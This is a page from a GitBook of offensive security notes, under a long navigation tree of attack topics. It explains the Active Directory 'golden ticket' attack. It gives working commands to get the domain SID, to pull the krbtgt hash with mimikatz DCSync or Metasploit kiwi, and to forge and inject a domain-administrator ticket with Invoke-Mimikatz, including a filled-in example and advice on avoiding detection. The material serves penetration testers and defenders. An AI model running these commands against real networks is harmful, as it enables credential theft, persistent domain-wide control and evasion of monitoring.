RFC - Offensive Security Notes
  • Active Directory
    • Enumeration
      • Active Directory Module
        • Enumerating the Domain
        • Enumerating ACLs
      • PowerView 3.0
      • Verify connectivity to domain controller
      • WMI domain enumeration through root\directory\ldap
      • PAM Trust
      • DNS discovery
        • Get-DnsServerZone
    • Privilege Escalation
      • Kerberos Delegation
        • Unconstrained delegation
        • Constrained delegation
        • Resource-based Constrained Delegation
      • Escalating from child to parent domain
      • Abusing inter-forest trust
      • WSUS server abuse
      • ACL Enumeration with PowerView 2.0
    • Persistence
      • Kerberos attacks
        • Golden ticket
        • Silver ticket
      • DSRM (Directory Services Restore Mode)
  • Initial Access
    • VBA Macros
      • Mark-of-the-Web
  • Discovery
    • Juicy files
      • PowerShell history
    • Network Enumeration
      • Network discovery scans
        • Ping scan
      • Nmap
      • Perimeter firewall scanning for open outbound ports
  • Execution
    • WMI
      • Remote code execution using WMI
    • PowerShell
      • C# assembly in PowerShell
        • List load assembly
        • Add-Type
        • UnsafeNativeMethods
        • DelegateType Reflection
        • Reflective Load
    • C# .Net Assembly
      • Process injection
        • Debugging
        • Using VirtualAllocEx and WriteProcessMemory
        • Using NTAPI Undocumented Functions
    • ReverseShells
      • Linux
        • Stabilizing zsh shell
    • Metasploit
      • HTTPs Meterpreter
  • Exploitation
    • Win32 APIs
      • OpenProcess
      • VirtualAllocEx
      • WriteProcessMemory
      • CreateRemoteThread
  • Credential Access
    • Microsoft Windows
      • Windows credential audit and logon types
      • Local credentials (SAM and LSA)
      • Lsass from forensics dump
      • Access Tokens
        • SeImpersonatePrivilege
      • ntds.dit
        • Dumping the contents of ntds.dit files using PowerShell
      • Mimikatz
      • LAPS
  • Lateral Movement
    • Windows Lateral Movement
      • Remote Desktop Protocol (RDP)
      • PowerShell Remoting (PS Remote)
        • Kerberos double hoping
      • Windows Task Scheduler
    • Linux Lateral Movement
  • Persistence
  • Defence Evasion
    • Antimalware Scan Interface (AMSI)
      • Debugging AMSI with Frida
      • PowerShell Bypasses
      • JS/VBA Bypasses
    • PowerShell
      • PowerShell version 2
      • Constrained Language Mode
      • Just Enough Administration (JEA)
      • ScriptBlockLogging
    • Microsoft Defender
    • Anti-virus evasion
      • Evasion and bypassing detection within C#
        • Encryptors
          • Aes encryptor
        • Sandbox evasion
          • Time accelerated checks
    • AppLocker
      • InstallUtil
      • MsBuild
  • Network Pivoting
    • Proxies and port fowarding
      • SSH
      • Metasploit
      • Socat
      • SSH Shuttle
      • Windows netsh command
    • Network discovery and scanning
  • Exfiltration
    • Windows
      • Copy files over SMB
  • Services
    • MS SQL Server
      • Enumeration
      • UNC Path Injection
      • Privilege Escalation
      • Linked Servers
      • SQL Injection
  • Misc
    • CrackMapExec
    • Cheat sheets
  • Cloud
    • Azure
      • Authentication
      • Enumeration
        • AzureHound
        • Az.Powershell
      • Initial Access
        • Device Code Phishing
        • Family-Of-Client-Ids - FOCI
        • JWT Assertion
Powered by GitBook
On this page
  • Information needed to create a golden ticket
  • Obtaining the domain information and sid
  • With PowerView
  • With domain user account
  • Obtaining krbtgt hash
  • Using Mimikatz
  • Metasploit kiwi module
  • Generating a golden ticket
  1. Active Directory
  2. Persistence
  3. Kerberos attacks

Golden ticket

A golden ticket is a forged TGT created with a stolen KDC key. A golden ticket enables the attacker to create a fake domain administrator identity to gain access to any service on a domain.

The KDC automatically trusts a TGT that is encrypted with a KDC key.

Information needed to create a golden ticket

  • Domain Name

  • Domain SID

  • Username to impersonate

  • krbtgt NTLM hash

Obtaining the domain information and sid

With PowerView

Get-DomainSID

With domain user account

whoami /user

Obtaining krbtgt hash

Using Mimikatz

The DCSync is a mimikatz feature which will try to impersonate a domain controller and request account password information from the targeted domain controller. This technique is less noisy as it doesn’t require direct access to the domain controller or retrieving the NTDS.DIT file over the network.

lsadump::dcsync /user:krbtgt

Metasploit kiwi module

dcsync_ntlm krbtgt

Generating a golden ticket

It's important to note down the domain kerberos policy to avoid detection

Invoke-Mimikatz -Command '"kerberos::golden /user:[impersonating user] /domain:[domain] /sid:[domain sid] /krbtgt:[krbtgt hash] /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:msp.local /sid:S-1-5-21-2998733414-582960673-4099777928 /krbtgt:aae39b0f0f043e3a7eefc88a13560c80 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

PreviousKerberos attacksNextSilver ticket

Last updated 2 years ago